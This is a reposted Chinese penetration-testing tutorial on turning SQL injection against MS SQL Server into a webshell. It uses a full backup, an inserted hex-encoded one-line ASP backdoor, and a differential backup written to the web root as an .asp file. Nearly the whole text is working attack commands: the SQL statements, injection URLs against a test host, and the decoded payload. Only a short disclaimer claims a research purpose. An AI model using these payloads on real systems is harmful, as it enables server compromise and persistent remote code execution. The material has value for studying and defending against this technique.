简介
差异备份数据库得到webshell。在sql server 里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
差异备份的流程大概这样:
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk ='c:ddd.bak';--
2.创建表并插入数据
create table [dbo].[dtest] ([cmd][image]);--insert into dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--
3.进行差异备份
backupdatabase 库名 to disk='目标位置d.asp' WITHDIFFERENTIAL,FORMAT;--
上面
0x3C25657865637574652872657175657374282261222929253E就是一句话木马的内容:<%execute(request("a"))%>
例子
测试例子中我目标网站的绝对路径是E:wwwrootasp_sqli,数据库名是asp_test
1、
http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk%20=%27E:wwwrootasp_sqliddd.bak%27;--
2、
http://192.168.5.21:81/index.asp?id=1;create%20table%20[dbo].[dtest]%20([cmd][image]);--http://192.168.5.21:81/index.asp?id=1;insert%20into%20dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--
3、
http://192.168.5.21:81/index.asp?id=1;backup%20database%20asp_test%20to%20disk=%27E:wwwrootasp_sqlid.asp%27%20WITH%20DIFFERENTIAL,FORMAT;--
菜刀连接d.asp即可。
转载自:卿先生博客地址:https://www.cnblogs.com/-qing-/p/10692824.html
没有专业运营团队,纯个人凭着空闲时间的学习,通过网络搜集与学习整理的资料记录并分享。
本文始发于微信公众号(LemonSec):Web渗透之mssql差异备份getshell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论